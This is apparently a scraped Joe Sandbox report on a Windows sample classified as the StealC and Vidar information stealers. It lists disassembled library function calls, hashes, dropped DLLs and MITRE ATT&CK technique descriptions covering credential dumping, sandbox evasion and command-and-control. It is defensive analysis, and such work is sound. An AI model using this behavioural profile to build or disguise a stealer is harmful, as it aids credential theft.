Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: 3f8ea3f2289b289d02665e86e738297a17e5c19c35765837e51524974b4ce032
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: F0F08CB7B0061867EF022A65AC04AFF36599B81299F080031FE18D6641FB26DD258BF7

Function 6C3B0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F1B

Part of subcall function 6C3B1370: GetSystemInfo.KERNEL32(?,?,?,?,6C3B0936,?,6C3B0F20,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000), ref: 6C3B138F

PR_NewLogModule.NSS3(clock,6C3B0936,FFFFE8AE,?,6C3416B7,00000000,?,6C3B0936,00000000,?,6C34204A), ref: 6C3B0F25

Part of subcall function 6C3B1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C3B0936,00000001,00000040), ref: 6C3B1130
Part of subcall function 6C3B1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C3B0936,00000001,00000040), ref: 6C3B1142
Part of subcall function 6C3B1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3B0936,00000001), ref: 6C3B1167

Strings

clock, xrefs: 6C3B0F20

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 221b460cce491a591b07aa1af6f53d659eaa1fca0b3dc889d8296e47785213e7
Instruction ID: f03ac21e3543f06abf11ec9573549a1995a71b07530bb508d69a782f97df83d2
Opcode Fuzzy Hash: 221b460cce491a591b07aa1af6f53d659eaa1fca0b3dc889d8296e47785213e7
Instruction Fuzzy Hash: 0AD0223220018411C11062579C45F96F3ECCBD3279F000822E01C51D008A3940EACAAF

Function 6C420DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C420DF5
TlsGetValue.KERNEL32 ref: 6C420E2D
TlsGetValue.KERNEL32 ref: 6C420E58
TlsGetValue.KERNEL32 ref: 6C420E84

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 2a07ae0721afa52229a68ee80f988f7c17c0f524cb8305984dc02c04ad9277d3
Instruction ID: a82a36b70c992179292c354eae6deb401b4077d2594c05493544d2d74de66a69
Opcode Fuzzy Hash: 2a07ae0721afa52229a68ee80f988f7c17c0f524cb8305984dc02c04ad9277d3
Instruction Fuzzy Hash: F431C5B06453858BEB10EF38C996E597BF4BF06309F014669D89887F11DB39D4C5CB86

Function 6C420F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C3C2AF5,?,?,?,?,?,6C3C0A1B,00000000), ref: 6C420F1A
malloc.MOZGLUE(00000001), ref: 6C420F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C420F42
TlsGetValue.KERNEL32 ref: 6C420F5B

Memory Dump Source

Source File: 00000002.00000002.1824478474.000000006C341000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C340000, based on PE: true

Associated: 00000002.00000002.1824448073.000000006C340000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824659417.000000006C51E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824684265.000000006C51F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824708483.000000006C520000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1824735455.000000006C525000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c340000_aspnet_regiis.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 0f707dca9dc14e818358ded1f6d443f5ebac11fa3964fe4b9fc56d7b9f13f39e
Instruction ID: ee7d6693ac76a12db703eff4ac78c9798d61542e09606aea0a5d7e7b0e95f135
Opcode Fuzzy Hash: 0f707dca9dc14e818358ded1f6d443f5ebac11fa3964fe4b9fc56d7b9f13f39e
Instruction Fuzzy Hash: E90168B1E802804BE720A73A8D56E56BBECEF52299F030131EC18C2E21E775D805C6E6

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFIIEBGCAAECBGCBGCBK

C:\ProgramData\AFIIEBGCAAECBGCBGCBKEHIJEB

C:\ProgramData\BFHJECAA

C:\ProgramData\ECAKKKKJDBKKFIEBKEHD

C:\ProgramData\ECAKKKKJDBKKFIEBKEHDGCAFCB

C:\ProgramData\JEHIDHDAKJDHJKEBFIEHCAAEHD

C:\ProgramData\KJJJJDHI

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

Windows Analysis Report
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Function 6CC211C0 Relevance: 31.0, APIs: 15, Strings: 2, Instructions: 1202
filememoryCOMMON

Function 6CC22630 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 423
COMMON

Function 6CC2A198 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CC2A248 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CC300BF Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 6CC2A091 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CC306BC Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 6CC3107A Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre